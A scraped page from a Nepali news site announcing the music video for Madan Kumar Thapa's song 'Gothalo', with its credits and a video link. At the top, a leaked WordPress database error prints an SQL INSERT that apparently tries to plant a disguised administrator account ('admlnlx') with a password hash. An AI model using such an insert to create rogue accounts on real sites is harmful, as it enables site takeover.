WordPress database error: [Duplicate entry '0' for key 'PRIMARY']
INSERT INTO `gi_users` (`user_pass`, `user_nicename`, `user_email`, `user_url`, `user_registered`, `user_activation_key`, `display_name`, `user_login`) VALUES ('$P$B6klJTZ31AEz25/UmhB9tU8Nv/RSGN0', 'admlnlx', 'wordpresupport@gaulekhabar.com', '', '2026-02-15 20:10:22', '', 'admlnlx', 'admlnlx')

गायक मदन कुमार थापाको ‘गोठालो’ बजारमा – Gaule Khabar

गायक मदन कुमार थापाको ‘गोठालो’ बजारमा

गायक मदन कुमार थापाको ‘गोठालो’ बजारमा

काठमाण्डौ । गायक मदन कुमार थापा ‘गोठालो’ गीतको म्युजिक भिडियो सार्वजानिक भएको छ ।

मनु आभाषको शब्द गायक मदन कुमार थापाकै संगीत, कर्साङ लामाको संगीत संयोजन र मिक्सिङ रहेको छ भने स्वार मदन कुमार थापा राम, चन्द्र चौलागाइ र गायिका संगीता चौलागाइको रहेको छ ।

भिडियोमा अर्जुन खड्का, सुस्मिता कोइराला, भरत घिमिरे, उत्तम ढकाल, सुजना घिमिरेको फिचरिङ्ग रहेको छ ।

उक्त भिडियोमा गंगा राम राईको छायांकन,सम्पादन, भिम तामाङले ड्रोन, देबराज गुरुङको कोरियोग्राफ, शशी बिक्रम थापाको निर्देशन रहेको छ ।

https://www.youtube.com/watch?v=7KaX8VQfynA

तपाइको प्रतिक्रिया दिनुहोस्

Your email address will not be published. Required fields are marked *

हामी तपाईंको इमे अरू सैसँग साझा र्दैनं।

ट्रेन्डिङ

धेरै कमेन्ट गरिएका